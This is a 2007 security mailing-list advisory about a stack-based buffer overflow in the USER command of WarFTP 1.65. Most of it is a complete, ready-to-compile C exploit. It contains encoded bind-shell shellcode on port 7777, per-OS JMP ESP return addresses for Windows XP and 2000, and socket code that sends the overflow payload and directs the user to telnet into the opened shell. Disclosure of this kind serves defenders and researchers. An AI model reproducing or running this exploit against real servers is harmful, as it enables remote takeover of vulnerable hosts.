From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 26 Mar 2007 13:43:39 +0200
Subject: [EXPL] WarFTP Stack Based Buffer Overflow (Username)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20070326154613.359385A41@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
WarFTP Stack Based Buffer Overflow (Username)
------------------------------------------------------------------------
SUMMARY
WarFTP is prone to a stack-based buffer-overflow vulnerability because it
fails to properly check boundaries on user-supplied data before copying it
to an insufficiently sized buffer.
DETAILS
Vulnerable Systems:
* WarFTP version 1.65
Exploit:
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#define VULNSERVER "WAR-FTPD 1.65"
#define VULNCMD "\x55\x53\x45\x52\x20"
#define ZERO '\x00'
#define NOP '\x90'
#define VULNBUFF 485
#define BUFFREAD 128
#define PORT 21
#define LENJMPESP 4
/* #######################
#####
#####
##### WARFTP - VERSION 1.65
#####
#####
#####
##### WarFTP Username Stack-Based Buffer-Overflow Vulnerability
#####
#####
#####
##### DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow
#####
##### vulnerability because it fails to properly check boundaries
#####
##### on user-supplied data before copying it to an insufficiently
#####
##### sized buffer.
#####
#####
#####
##### FUNC VULNERABLE: sprintf(char *buffer, const char *format, argv)
#####
##### 0x004044E7: sprintf(0x00ACFB50, "%sCRLF", ExploitBuffer)
#####
#####
#####
##### AFFECTED VERSION: 1.65
#####
##### USE: warftphack.exe IP_ADDRESS SO_&_SERVICE_PACK [ ESP ADDRESS ]
#####
##### SO_&_SERVICE_PACK:
#####
##### [0] Microsoft Windows XP Pro Spanish SP0
#####
##### [1] Microsoft Windows XP Pro Spanish SP1
#####
##### [2] Microsoft Windows XP Pro Spanish SP2
#####
##### [3] Microsoft Windows XP Pro English SP0
#####
##### [4] Microsoft Windows XP Pro English SP1
#####
##### [5] Microsoft Windows XP Pro English SP2
#####
##### [6] Microsoft Windows 2000 Pro Spanish SP0
#####
##### [7] Microsoft Windows 2000 Pro Spanish SP1
#####
##### [8] Microsoft Windows 2000 Pro Spanish SP2
#####
##### [9] Microsoft Windows 2000 Pro Spanish SP3
#####
##### [10] Microsoft Windows 2000 Pro English SP0
#####
##### [11] Microsoft Windows 2000 Pro English SP1
#####
##### [12] Microsoft Windows 2000 Pro English SP2
#####
##### [13] Microsoft Windows 2000 Pro English SP3
#####
##### [14] Custom -> JMP ESP ADDRESS
#####
#####
#####
##### EXAMPLE: warftphack.exe 127.0.0.1 2
#####
##### EXAMPLE2: warftphack.exe 127.0.0.1 14 0x776EDDFF
#####
#####
#####
##### AUTOR: niXel - SYSCODE (SPAIN)
#####
##### IDE: Dev-C ver-4.9.9.2
#####
##### COMPILER: MinGW
#####
##### DEPENDENCES: Linker -> libwsock32.a
#####
##### MAIL: [email protected]
#####
#####
#####
############
CAUTION: USER command vulnerable => no send \x40 (@) char into
shellcode (user@host)
no send \x0A (\n) char into
shellcode
no send \x0D (\r) char into
shellcode
FUNCTION sprintf => no send \x00 (\0) char into shellcode
############################ BINDSHELLCODE
##############################
[7777]
*/
char syscode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
"\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
"\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
"\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
"\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
"\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
"\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
"\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
"\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
"\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
"\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
"\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
"\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
"\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
"\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
"\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
"\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
"\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
"\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
"\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
"\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
"\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
"\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
"\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
"\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
"\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
"\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
"\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
"\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
"\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
"\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
"\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
"\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
"\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
"\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
"\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
"\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
"\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
"\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
"\x6f\x58\x56\x49\x6f\x78\x50\x61";
int main(int argc, char ** argv) {
char buffRead[BUFFREAD], jmpESP[LENJMPESP], ch, ch2;
char * pbuffSend;
unsigned int err = 0, i, k;
int sockData, j;
struct sockaddr_in their_addr;
WSADATA wsaData;
system("cls");
fprintf(stdout, "\n\tWarFTP Username Stack-Based Buffer-Overflow
Vulnerability\n");
fprintf(stdout, "
____________________________________________________________________\n\n");
if (((argc == 3) && (atoi(argv[2]) >= 0) && (atoi(argv[2]) < 14)) ||
((argc == 4) && (atoi(argv[2]) == 14))) {
if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {
if ((sockData = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
/* Server data struct */
their_addr.sin_family = AF_INET; // ;
Family AF_INET
their_addr.sin_addr.s_addr = inet_addr(argv[1]); // ; IP
Address = Argv[1]
their_addr.sin_port = htons(PORT); // ;
Port = 21
memset(&(their_addr.sin_zero), '0', 8); // ;
IP:Port = Argv[1]:21
if (connect(sockData, (struct sockaddr *) &their_addr,
sizeof(struct sockaddr)) != -1) {
recv(sockData, buffRead, BUFFREAD, 0);
buffRead[BUFFREAD - 1] = ZERO;
if (strstr(buffRead, VULNSERVER) != NULL) {
/* ###################################
##### BufferSend -> "USER A*VULNBUFF @JMP_ESP
\x90\x90\x90\x90 SYSCODE \r\n #####
###################################### */
pbuffSend = (char *) malloc(strlen(VULNCMD) + VULNBUFF +
LENJMPESP + (sizeof(char) * 4) + strlen(syscode) + (sizeof(char) * 2));
if (pbuffSend != NULL) {
for (i=0; i < strlen(VULNCMD); i++) *(pbuffSend + i)
= VULNCMD[i];
for (j=0; j < VULNBUFF; i++, j++) *(pbuffSend + i) =
'\x41';
/* - OPcodes from ntdll.dll ->
JMP ESP - */
switch(atoi(argv[2])) {
case 0: memcpy(jmpESP, "\xE3\x39\xF4\x77",
LENJMPESP); break;
case 1: memcpy(jmpESP, "\x0F\x98\xF8\x77",
LENJMPESP); break;
case 2: memcpy(jmpESP, "\xED\x1E\x95\x7C",
LENJMPESP); break;
case 3: memcpy(jmpESP, "\xE3\x39\xF4\x77",
LENJMPESP); break;
case 4: memcpy(jmpESP, "\xCC\x59\xFA\x77",
LENJMPESP); break;
case 5: memcpy(jmpESP, "\xED\x1E\x95\x7C",
LENJMPESP); break;
case 6: memcpy(jmpESP, "\xFF\xFF\xFF\xFF",
LENJMPESP); break;
case 7: memcpy(jmpESP, "\xFF\xFF\xFF\xFF",
LENJMPESP); break;
case 8: memcpy(jmpESP, "\xFF\xFF\xFF\xFF",
LENJMPESP); break;
case 9: memcpy(jmpESP, "\xFF\xFF\xFF\xFF",
LENJMPESP); break;
case 10: memcpy(jmpESP, "\x8B\x94\xF8\x77",
LENJMPESP); break;
case 11: memcpy(jmpESP, "\xAB\x67\xF9\x77",
LENJMPESP); break;
case 12: memcpy(jmpESP, "\xFF\xFF\xFF\xFF",
LENJMPESP); break;
case 13: memcpy(jmpESP, "\xFF\xFF\xFF\xFF",
LENJMPESP); break;
case 14:
k = 0;
if ((strncmp(argv[3], "0x", (sizeof(char) * 2))
== 0) && (strlen(argv[3]) == 10)) {
for (j=(sizeof(char) * 8) - 1; ((j >= 0) &&
(!err)); j--) {
ch = *(argv[3] + j + 2);
if (((ch > 47) && (ch < 58)) || ((ch >
64) && (ch < 71)) || ((ch > 96) && (ch < 103))) {
if ((ch > 47) && (ch < 58)) ch -= 48;
else if ((ch > 64) && (ch < 71)) ch -=
55;
else ch -= 87;
if ((j % 2) == 0) jmpESP[k++] = ((ch
<<= 4) | ch2);
else ch2 = ch;
}
else { fprintf(stderr, "\t[ ERROR ] Three
parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
}
}
else { fprintf(stderr, "\t[ ERROR ] Three
parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
}
if (!err) {
for (j=0; j < LENJMPESP; i++, j++) *(pbuffSend +
i) = jmpESP[j];
for (j=0; j < (sizeof(char) * 4); i++, j++)
*(pbuffSend + i) = NOP;
for (j=0; j < strlen(syscode); i++, j++)
*(pbuffSend + i) = syscode[j];
memcpy(pbuffSend + i, "\r\n", (sizeof(char) * 2));
if (i == send(sockData, pbuffSend, ++i, 0)) {
fprintf(stdout, "\t[ OK ] Exploit buffer send to
%s:%d\n", argv[1], PORT);
fprintf(stdout, "\t[ OK ] If you have not chosen
a correct operating system and\n\t service pack you can cause a
D.O.S\n");
fprintf(stdout, "\t[ OK ] Connect: telnet %s
7777\n", argv[1]);
}
else fprintf(stderr, "\t[ ERROR ] No sending all
exploit buffer\n");
}
free(pbuffSend);
}
else fprintf(stderr, "\t[ ERROR ] No allocate
memory\n");
}
else fprintf(stderr, "\t[ ERROR ] Not a vulnerable
server\n");
}
else fprintf(stderr, "\t[ ERROR ] Connect to %s:%d\n",
argv[1], PORT);
closesocket(sockData);
}
else fprintf(stderr, "\t[ ERROR ] Create local socket\n");
WSACleanup();
}
else fprintf(stderr, "\t[ ERROR ] Load library");
}
else {
fprintf(stderr, " [ + ] USE: %s IP_ADDRESS SERVICE_PACK [
ESP_ADDRESS ]\n\n", argv[0]);
fprintf(stderr, " [ + ] SERVICE PACK: [ - ] Microsoft Windows XP
Pro Spanish SP0 (0)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP1
(1)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP2
(2)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP0
(3)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP1
(4)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP2
(5)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP0
(6)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP1
(7)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP2
(8)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP3
(9)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP0
(10)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP1
(11)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP2
(12)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP3
(13)\n");
fprintf(stderr, "\t\t\t[ - ] Custom Service Pack - JMP %%ESP
(14)\n\n");
fprintf(stderr, " [ + ] EXAMPLE: %s 127.0.0.1 2\n", argv[0]);
fprintf(stderr, " [ + ] EXAMPLE2: %s 127.0.0.1 14 0x776EDDFF\n",
argv[0]);
}
fprintf(stdout, "
___________________________________________________________________\n\n");
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by milw0rm.
The original article can be found at:
<http://www.milw0rm.com/exploits/3570>;
http://www.milw0rm.com/exploits/3570
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
